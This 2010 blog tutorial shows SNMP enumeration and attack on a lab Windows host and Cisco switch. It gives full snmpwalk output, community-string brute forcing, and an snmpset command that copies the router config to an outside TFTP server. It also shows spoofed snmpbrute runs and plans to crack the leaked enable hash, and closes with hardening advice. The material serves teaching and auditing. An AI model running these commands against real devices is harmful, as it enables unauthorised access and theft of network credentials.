IP

Wednesday, November 24, 2010

SNMP (Simple Network Management Protocol) Enumeration And Hacking


SNMP (Simple Network Management Protocol) 
Simple Network Management Protocol (SNMP) is a TCP/IP standard protocol that is used for remote monitoring, managing hosts, routers, and devices on a network. SNMP works through a system of agents and nodes. Gathering information about hosts, routers, devices etc. with the help of SNMP is known as SNMP enumeration. Although SNMP version 3 provides data encryption, the more widely used SNMP version 1 is a clear text protocol that offers limited security by using community strings. The names of the default community strings are public and private , which are transmitted in clear text. Default community strings are advantageous to a hacker, as they provide more than enough information needed to launch an attack.


This tutorial will assume you know your stuff, but just a few basic terms

SNMP - (Simple Network Management Protocol) - an application-layer protocol for managing TCP/IP based networks. SNMP runs over UDP (which runs over IP). 

MIB - (Management Information Base) - provides a standard representation of the SNMP agent's available information and where it is stored. 

NMS - (Network Management Station) - A device designed to poll SNMP agents for information. 

SNMP Agent - a device running some software that understands the language of SNMP. Almost any network device could potentially run SNMP, but typically you will find SNMP agents running on internetworking devices (eg. routers, hubs, switches, bridges). Some operating systems (UNIX, Windows NT) can also run SNMP agents. 

The main problem with SNMP is that the authentication method (public and private community strings) is inherently weak, not to mention the fact the SNMP is based on UDP, which is prone to spoofing. So, we've got a weak protocol, often forgotten and misconfigured - a disaster just waiting to happen. 
Just to get a taste of what kind on info SNMP can get, we'll use snmpwalk - a linux based tool. (I've found Win32 ports for these tools, but I strongly suggest using Linux for this tutorial). 

In the first example we will use "public" (the default) community string to enumerate a Windows Machine running SNMP. 

 #snmpwalk -c public 192.168.0.222
(General Info)
.iso.3.6.1.2.1.1.1.0 = "Hardware: x86 Family 6 Model 8 Stepping 0 AT/AT COMPATIBLE - Software: Windows 2000 Version 5.0"
iso.3.6.1.2.1.6.13.1.2.192.168.0.222.139.0.0.0.0.59542 = IpAddress: 192.168.0.222
(Open Ports)
.iso.3.6.1.2.1.6.13.1.3.0.0.0.0.21.0.0.0.0.59620 = 21
iso.3.6.1.2.1.6.13.1.3.0.0.0.0.25.0.0.0.0.18484 = 25
.iso.3.6.1.2.1.6.13.1.3.0.0.0.0.80.0.0.0.0.59465 = 80
iso.3.6.1.2.1.6.13.1.3.0.0.0.0.119.0.0.0.0.51385 = 119
iso.3.6.1.2.1.6.13.1.3.0.0.0.0.135.0.0.0.0.26722 = 135
iso.3.6.1.2.1.6.13.1.3.0.0.0.0.443.0.0.0.0.2272 = 443
iso.3.6.1.2.1.6.13.1.3.0.0.0.0.445.0.0.0.0.43190 = 445
iso.3.6.1.2.1.6.13.1.3.0.0.0.0.563.0.0.0.0.34828 = 563
iso.3.6.1.2.1.6.13.1.3.0.0.0.0.1025.0.0.0.0.10361 = 1025
iso.3.6.1.2.1.6.13.1.3.0.0.0.0.1026.0.0.0.0.18486 = 1026
.iso.3.6.1.2.1.6.13.1.3.0.0.0.0.1029.0.0.0.0.18510 = 1029
iso.3.6.1.2.1.6.13.1.3.0.0.0.0.1755.0.0.0.0.10411 = 1755
.iso.3.6.1.2.1.6.13.1.3.0.0.0.0.3372.0.0.0.0.2224 = 3372
iso.3.6.1.2.1.6.13.1.3.0.0.0.0.3389.0.0.0.0.59426 = 3389
..iso.3.6.1.2.1.6.13.1.3.192.168.0.222.139.0.0.0.0.59542 = 139
(Drives)
iso.3.6.1.2.1.25.2.3.1.3.1 = "A:"
.iso.3.6.1.2.1.25.2.3.1.3.2 = "C: Label:  Serial Number 28a1a476"
.iso.3.6.1.2.1.25.2.3.1.3.3 = "D: Label:W2KSEL_EN  Serial Number 9ac432a9"
iso.3.6.1.2.1.25.2.3.1.3.4 = "Virtual Memory"
(Processes)
iso.3.6.1.2.1.25.4.2.1.2.1 = "System Idle Process
iso.3.6.1.2.1.25.4.2.1.2.8 = "System"
iso.3.6.1.2.1.25.4.2.1.2.176 = "smss.exe"
iso.3.6.1.2.1.25.4.2.1.2.200 = "csrss.exe"
iso.3.6.1.2.1.25.4.2.1.2.224 = "winlogon.exe"
iso.3.6.1.2.1.25.4.2.1.2.252 = "services.exe"
iso.3.6.1.2.1.25.4.2.1.2.264 = "lsass.exe"
iso.3.6.1.2.1.25.4.2.1.2.380 = "termsrv.exe"
iso.3.6.1.2.1.25.4.2.1.2.500 = "svchost.exe"
iso.3.6.1.2.1.25.4.2.1.2.532 = "SPOOLSV.EXE"
iso.3.6.1.2.1.25.4.2.1.2.564 = "msdtc.exe"
.iso.3.6.1.2.1.25.4.2.1.2.668 = "svchost.exe"
iso.3.6.1.2.1.25.4.2.1.2.692 = "llssrv.exe"
iso.3.6.1.2.1.25.4.2.1.2.768 = "NSPMON.exe"
.iso.3.6.1.2.1.25.4.2.1.2.796 = "NSCM.exe"
iso.3.6.1.2.1.25.4.2.1.2.868 = "regsvc.exe"
.iso.3.6.1.2.1.25.4.2.1.2.908 = "mstask.exe"
iso.3.6.1.2.1.25.4.2.1.2.960 = "VMwareService.e"
iso.3.6.1.2.1.25.4.2.1.2.992 = "svchost.exe"
iso.3.6.1.2.1.25.4.2.1.2.1020 = "dfssvc.exe"
iso.3.6.1.2.1.25.4.2.1.2.1040 = "inetinfo.exe"
iso.3.6.1.2.1.25.4.2.1.2.1056 = "nspm.exe"
iso.3.6.1.2.1.25.4.2.1.2.1108 = "NSUM.exe"
iso.3.6.1.2.1.25.4.2.1.2.1364 = "explorer.exe"
iso.3.6.1.2.1.25.4.2.1.2.1544 = "VMwareTray.exe"
iso.3.6.1.2.1.25.4.2.1.2.1572 = "VMwareUser.exe"
iso.3.6.1.2.1.25.4.2.1.2.1600 = "cmd.exe"
iso.3.6.1.2.1.25.4.2.1.2.1616 = "mdm.exe"
iso.3.6.1.2.1.25.4.2.1.2.1660 = "mshta.exe"
iso.3.6.1.2.1.25.4.2.1.2.1712 = "snmp.exe"
iso.3.6.1.2.1.25.4.2.1.2.1724 = "snmptrap.exe"
 (Installed Apps)
iso.3.6.1.2.1.25.6.3.1.2.1 = "Sentinel 2.0"
iso.3.6.1.2.1.25.6.3.1.2.2 = "VMware Tools"
iso.3.6.1.2.1.25.6.3.1.2.3 = "WebFldrs"
#


We see that a simple walk on the standard MIB tree wield a whopping amount of information. By using specific vendor private mibs, more information can be found - as can be seen by using Filip Waeytens' tool - SNMPEnum. Notice that "windows.txt" contains private MIB values for Microsoft Products. 


# perl snmpenum.pl
Usage: perl enum.pl <IP-address> <community> <configfile>
# perl snmpenum.pl 192.168.0.222 windows.txt 

SERVICES

Server
Alerter
Event Log
Messenger
DNS Client
DHCP Client
Workstation
SNMP Service
Plug and Play
…..
World Wide Web Publishing Service
Distributed Transaction Coordinator
Simple Mail Transport Protocol (SMTP)
Network News Transport Protocol (NNTP)
Windows Management Instrumentation Driver Extensions

DISKS

A:
C: Label:  Serial Number 28a1a476
D: Label:W2KSEL_EN  Serial Number 9ac432a9
Virtual Memory

LISTENING TCP PORTS

21
25
80
119
135
443
445
563
1025
1026
1029
1755
3372
3389

UPTIME

16 minutes, 52.92

LISTENING UDP PORTS

135
161
162
445
1028
1030
1755
3456

USERS

Guest
IUSR_LAB-SP3
IWAM_LAB-SP3
Administrator
TsInternetUser
NetShowServices

DOMAIN

WORKGROUP

SYSTEM INFO

Hardware: x86 Family 6 Model 8 Stepping 0 AT/AT COMPATIBLE - Software: Windows 2000 Version 5.0 (Build 2195 Uniprocessor Free)

HOSTNAME

LAB-SP3

RUNNING PROCESSES

System Idle Process
System
smss.exe
csrss.exe
winlogon.exe
services.exe
lsass.exe
termsrv.exe
svchost.exe
…
cmd.exe
mdm.exe
mshta.exe
snmp.exe
snmptrap.exe

INSTALLED SOFTWARE

Sentinel 2.0
VMware Tools
WebFldrs

SHARES

MyShare
C:Documents and SettingsAdministratorDesktopMyShare


Surprised? Yes…SNMP is a powerful enumeration tool. However, a common misconception is that SNMP is "read only", and that no actual changes can be made using SNMP. This couldn't be further from the truth as we will see in this next example. 

The Community strings for SNMP can be brute forced, using a variety of tools (I heard rumors of a perl tool coming out soon J). I will be using the SNMP Bruteforce tool from the Solarwinds tool pack, to bruteforce the community strings of a router: 





Once the read / write community string is found, we can use snmpset to download the router config file. Notice the syntax: 

snmpset -c <RW community> <router hostname/IP>.1.3.6.1.4.1.9.2.1.55.<TFTP IP octet1>.<octet 2>.<octet 3>.<octet 4> string <path/file on TFTP server to save file to> 


# snmpset -c password 192.168.1.254 .1.3.6.1.4.1.9.2.1.55.192.168.1.232 s conf
SNMPv2-SMI::enterprises.9.2.1.55.192.168.1.232 = STRING: "conf"
# cat conf
version 12.0
no service pad
service timestamps debug uptime
service timestamps log uptime
no service password-encryption
!
hostname Muts
!
enable secret 5 $1$w1lV$bRSsthY/jKg1SEooEyki3/
!
ip subnet-zero
!
interface FastEthernet0/1
…….
interface FastEthernet0/24
!
ip default-gateway 192.168.1.138
snmp-server community password RW
snmp-server community test RO
!
line con 0
transport input none
stopbits 1
line vty 0 4
password muts
login
line vty 5 15
password muts
 login
!
end
#


We have downloaded the config file, with all the configuration parameters of the router (well, it's a switch, but same-same). We see the snmp and vty passwords in clear text, however, the enable password is encrypted. We can use john the ripper to brute this hash. We'll be taking the encrypted password, and formatting it in a text file, similar to the format of unix shadow files. 



Once this is done we run john on this file, and wait for the password to be found: 



We have now found the enable password to the router. We can log on using "muts" and "mutz" as the password and enable password respectively. 



A nice bruteforcer, spoofer and automatic config downloader called snmpbrute (found in packetstorm) will actually bruteforce and copy the router config file to a TFTP server, assuming the correct community name is found. 


#snmpbrute -s 192.168.1.254 -d 192.168.1.254 -w word.txt -m 2 -t 192.168.1.232
Ok, spoofing packets from 192.168.1.254 to 192.168.1.254 with wordlist word.txt 
(Delay: 200)
TFTP Address:192.168.1.232
Size is 39
Read 6 words/lines
Address of tftp server is 192.168.1.232
# cat running-config
!
version 12.0
no service pad
service timestamps debug uptime
service timestamps log uptime
no service password-encryption
!
hostname Muts
!
enable secret 5 $1$w1lV$bRSsthY/jKg1SEooEyki3/
!
ip subnet-zero
!
interface FastEthernet0/1
…
interface FastEthernet0/24
!
interface VLAN1
ip address 192.168.1.254 255.255.255.0
no ip directed-broadcast
no ip route-cache
!
ip default-gateway 192.168.1.138
snmp-server engineID local 0000000902000003E3645800
snmp-server community password RW
snmp-server community test RO
!
line con 0
transport input none
stopbits 1
line vty 0 4
password muts
login
line vty 5 15
password muts
login
!
end
#


IMHO, Solarwinds has got the most complete set of SNMP security / testing tools. Just a few more screenshots of Solarwinds, to get the curiosity running.. .. 





Summary and Conclusion 
Since SNMP is not usually audited, and may pose a significant threat if left misconfigured, it is considered a "high risk" protocol. If you have to use it, make sure to use strong community passwords, and configure SNMP access lists accordingly. If you have an option, consider using SNMP v.3. 

Most importantly…..Get to know your SNMP!










































SNMP  is a protocol that never seems to get the attention it deserves. 
Read in details :http://www.chapo.co.il/articles/snmp/ 
http://net-snmp.sourceforge.net/ 
http://www.cisco.com/univercd/cc/td/doc/cisintwk/ito_doc/snmp.htm 
Posted by Vaquar Khan :-JAVA J2EE Technical Specialis & Cyber Security Expert at 11:44 PM
Labels:

1 comment:

  1. UnknownFebruary 25, 2011 at 12:14 AM

    You need to accomplish it all quickly and cost-effectively. Network management is important to companies because businesses rely heavily on the network to perform communications and process-related tasks.

    ReplyDelete

Subscribe to: Post Comments (Atom)